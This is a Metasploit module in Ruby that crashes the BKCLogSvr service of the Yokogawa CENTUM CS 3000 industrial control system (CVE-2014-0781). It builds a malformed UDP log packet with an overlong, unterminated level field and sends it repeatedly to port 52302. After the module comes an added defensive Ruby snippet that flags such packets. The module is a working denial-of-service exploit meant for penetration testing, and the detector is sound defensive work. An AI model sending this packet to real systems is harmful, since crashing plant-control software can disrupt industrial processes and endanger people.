rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/scada/yokogawa_logsvr.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow',
        'Description' => %q{
          This module abuses a buffer overflow vulnerability to trigger a Denial of Service
          of the BKCLogSvr component in the Yokogawa CENTUM CS 3000 product. The vulnerability
          exists in the handling of malformed log packets with an unexpectedly long level field.
          The root cause of the vulnerability is a combination of usage of uninitialized memory
          from the stack and a dangerous string copy. This module has been tested successfully
          on Yokogawa CENTUM CS 3000 R3.08.50.
        },
        'Author' => [
          'juan vazquez',
          'Redsadic <julian.vilas[at]gmail.com>'
        ],
        'References' => [
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
          [ 'URL', 'https://web.archive.org/web/20221209030848/https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/' ],
          [ 'CVE', '2014-0781']
        ],
        'DisclosureDate' => '2014-03-10',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(52302),
        OptInt.new('RLIMIT', [true, 'Number of packets to send', 10])
      ]
    )
  end

  def run
    if datastore['RLIMIT'] < 2
      print_error('Two consecutive packets are needed to trigger the DoS condition. Please increment RLIMIT.')
      return
    end

    # Malformed log packet: the level field runs unterminated into the
    # message, so the service reads bad memory when it processes it.
    test = [1024].pack('V') # packet length (little-endian)
    test << 'AAAA' # Unknown
    test << "SOURCE\x00\x00" # Source
    test << "\x00" * 8 # Padding
    test << 'B' * (1024 - test.length) # Level & Message coalesced

    connect_udp

    # Sending two consecutive packets is enough to
    # trigger the overflow and cause the DoS. But if
    # legitimate packets are processed by the server between
    # the two malformed packets, the overflow won't happen.
    # Unfortunately, because of the usage of UDP and the
    # absence of an answer, there isn't a reliable way to
    # check whether the DoS condition has been triggered.
    print_status("Sending #{datastore['RLIMIT']} packets...")
    (1..datastore['RLIMIT']).each do |i|
      vprint_status("Sending #{i}/#{datastore['RLIMIT']}...")
      udp_sock.put(test)
    end

    disconnect_udp
  end
end
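As an added, defender-side example (not part of this module or of the Metasploit project): a small Ruby heuristic that parses a BKCLogSvr log packet using the field layout implied by the module's packet construction (4-byte little-endian length, 4 unknown bytes, 8-byte source, 8 bytes of padding, then level and message) and flags packets whose level field is unterminated or longer than an assumed ceiling. The MAX_LEVEL_LEN ceiling and the "benign" sample are constructed assumptions, not documented values.

```ruby
# Constructed example: flag BKCLogSvr log packets whose level/message area
# has no NUL terminator within a sane bound. Field layout follows the packet
# the module above builds; MAX_LEVEL_LEN is an assumed ceiling, not a spec.

HEADER_LEN    = 24   # 4 length + 4 unknown + 8 source + 8 padding
MAX_LEVEL_LEN = 64   # assumed ceiling for a legitimate level field

# Parse the fixed header; returns a hash, or nil if the packet is truncated.
def parse_log_packet(data)
  return nil if data.bytesize < HEADER_LEN
  declared_len = data.byteslice(0, 4).unpack1('V')
  source       = data.byteslice(8, 8).delete("\x00")
  body         = data.byteslice(HEADER_LEN..-1) || ''
  nul          = body.index("\x00")
  {
    declared_len: declared_len,
    actual_len:   data.bytesize,
    source:       source,
    level_len:    nul.nil? ? body.bytesize : nul,
    terminated:   !nul.nil?
  }
end

# Returns the reasons a packet looks malformed (empty array => looks fine).
def suspicious_reasons(data)
  pkt = parse_log_packet(data)
  return ['truncated header'] if pkt.nil?
  reasons = []
  reasons << 'declared length != wire length' if pkt[:declared_len] != pkt[:actual_len]
  reasons << 'level field not NUL-terminated' unless pkt[:terminated]
  reasons << "level field too long (#{pkt[:level_len]})" if pkt[:level_len] > MAX_LEVEL_LEN
  reasons
end

# Constructed samples: a plausible benign packet (assumed shape) and one
# shaped like the module's packet (level and message run together, no NUL).
def benign_sample
  body = "INFO\x00pump started\x00"
  [HEADER_LEN + body.bytesize].pack('V') + 'AAAA' + "SOURCE\x00\x00" + "\x00" * 8 + body
end

def malformed_sample
  pkt = [1024].pack('V') + 'AAAA' + "SOURCE\x00\x00" + "\x00" * 8
  pkt << 'B' * (1024 - pkt.length)
end

if __FILE__ == $0
  puts "benign:    #{suspicious_reasons(benign_sample).inspect}"
  puts "malformed: #{suspicious_reasons(malformed_sample).inspect}"
end
```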